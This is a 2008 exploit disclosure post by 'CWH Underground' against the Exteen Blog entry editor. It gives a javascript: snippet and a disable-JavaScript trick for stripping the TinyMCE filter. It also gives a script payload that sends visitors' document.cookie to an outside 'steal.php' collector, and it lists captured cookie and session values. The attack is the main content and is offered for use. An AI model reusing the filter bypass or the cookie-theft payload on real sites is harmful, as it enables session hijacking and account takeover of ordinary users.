<<< Date Index >>>     <<< Thread Index >>>

Exteen Blog XSS Remote Cookie Disclosure Exploit



==========================================================
     Exteen Blog XSS Remote Cookie Disclosure Exploit             
==========================================================


AUTHOR : CWH Underground
DATE   : 22 May 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Exteen Blog
 VENDOR      : www.exteen.com
#####################################################

--- Vulnerable page ---
[-] http://www.exteen.com/manage/entryeditor.php (Create New Entry Page)

--- Description ---
There are 2 ways to exploit this page

1. Type "javascript:(function(){var x = 
document.getElementById('mce_editor_0_parent'); x.previousSibling.style.display 
= 'block';x.parentNode.removeChild (x);})()" on address bar and press Enter
2. Disable javascript on your Browser and visit vulnerable page
                                                                                
                                                        .
Two methods above will remove tinymce filter after that you can insert any 
script or HTML tag in your entry :D


--- Exploit (Grabbing Cookies)---

Simple Attack: <script>document.location = 
'http://yoursite.com/steal.php?cookie=' + document.cookie;</script>


--- Note ---

This website implement httpOnly that prevent from stealing cookies on ie (>= 6) 
and firefox (>= 2.0.0.5)

=Result=
IE & Gecko:     _uid57334=D8428C8A.2; _cbclose57334=1; _ctout57334=1; 
VisitOn=54016; VisitorTRUE=11
OPERA & Safari: _cbclose57334=1; _uid57334=16944A6F.1; 
sid=gdcvv9mab89uf9cmg3hqmhq570; keyx=NjgdHFErNXpCD1wpVTsYCF0dfx8KBTIDEFM; 
_ctout57334=1

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #
##################################################################